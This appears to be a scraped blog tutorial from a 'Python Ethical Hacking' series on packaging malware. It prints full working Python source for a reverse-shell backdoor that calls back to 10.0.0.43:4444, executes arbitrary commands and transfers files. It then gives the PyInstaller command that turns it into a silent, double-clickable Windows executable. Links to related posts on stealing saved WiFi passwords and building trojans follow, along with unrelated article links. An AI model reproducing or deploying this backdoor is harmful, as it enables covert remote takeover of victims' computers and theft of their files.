PACKAGING

  • Convert python program into an executable that:

    • Packages all program files into a single executable.
    • Works without a python interpreter.
    • Get executed when double-clicked.
  • For best results package the program from the same OS as the target.

    • EG if the target is Windows then package the program from a Windows computer with a python interpreter.

Install PyInstaller firstly.

Refer to : https://pyinstaller.readthedocs.io/en/latest/installation.html

Polish the backdoor code to fit the silent executable.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Convert the python program to an executable program.

C:\Python37\Scripts\pyinstaller.exe reverse_backdoor.py --onefile --noconsole

Find and double-click the reverse-backdoor.exe program in the dist folder.

The executable program runs perfectly.

Python Ethical Hacking - Malware Packaging(1)的更多相关文章

  1. Python Ethical Hacking - Malware Packaging(2)

    PACKAGING FOR WINDOWS FROM LINUX For best results package the program from the same OS as the target ...

  2. Python Ethical Hacking - Malware Packaging(4)

    Converting Python Programs to Linux Executables Note: You can not execute the program on Linux by do ...

  3. Python Ethical Hacking - Malware Packaging(3)

    Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073a ...

  4. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  5. Python Ethical Hacking - Malware Analysis(4)

    DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...

  6. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  7. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  8. Python Ethical Hacking - TROJANS Analysis(2)

    DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...

  9. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

随机推荐

  1. EOS基础全家桶(十三)智能合约基础

    简介 智能合约是现在区块链的一大特色,而不同的链使用的智能合约的虚拟机各不相同,编码语言也有很大差异.而今天我们开始学习EOS的智能合约,我也是从EOS初期一直开发合约至今,期间踩过无数坑,也在Sta ...

  2. Java工程中各种带有O的对象分类笔记

    在Java工程里面,我们总会碰到各种不同的带有O的对象, 对于一个小白来说,经常会混淆这些对象的使用场景,所以在这里mark一下,让自己的代码更加规范,但这个也是Java被诟病的地方,不同的业务需要给 ...

  3. elk2

    如果使用codec->json进行解码,表示输入到logstast中的input数据必须是json的格式,否则会解码失败 java中一句代码异常会抛出多条的堆栈日志,我们可以使用上面的mutil ...

  4. .net core docker容器编排部署(linux)

    环境准备 需要一个linux操作系统:我这里用的是ubuntu 18.04,安装步骤就不说了,网上很多教程,当然也可以私信我. 既然需要用到docker,那么就安装个docker,apt instal ...

  5. 【写法总结】$.ajax与$.post、$.get 写法区别

    原文: https://www.cnblogs.com/asdyzh/p/9807264.html   后台代码: [HttpPost] public string DoLogin(string us ...

  6. 缺少对公共可见类型或成员的XML注释

    最近突然心血来潮,想清理下代码,结果看到了一堆这样的警告——缺少对公共可见类型或成员“XXX”的 XML 注释: 其实要想取消上面的警告,仅仅需要在项目属性里找到生成页签里的”错误和警告“项,在禁止显 ...

  7. tomcat配置项目虚拟路径

    tomcat版本:apache-tomcat-7.0.42 参考:http://blog.csdn.net/pangdingshan/article/details/7214786 一.虚拟根目录 1 ...

  8. (八十九)c#Winform自定义控件-自定义滚动条(treeview、panel、datagridview、listbox、listview、textbox)

    官网 http://www.hzhcontrols.com/ 前提 入行已经7,8年了,一直想做一套漂亮点的自定义控件,于是就有了本系列文章. GitHub:https://github.com/kw ...

  9. PBR(基于物理的渲染)学习笔记

    PBR基本介绍 PBR代表基于物理的渲染,本质上还是 gl_FragColor = Emssive + Ambient + Diffuse + Specular 可能高级一些在考虑下AO也就是环境光遮 ...

  10. 如何修复 WordPress 中的 HTTP 错误

    如何修复我们会向你介绍,如何在 Linux VPS 上修复 WordPress 中的 HTTP 错误. 下面列出了 WordPress 用户遇到的最常见的 HTTP 错误,我们的建议侧重于如何发现错误 ...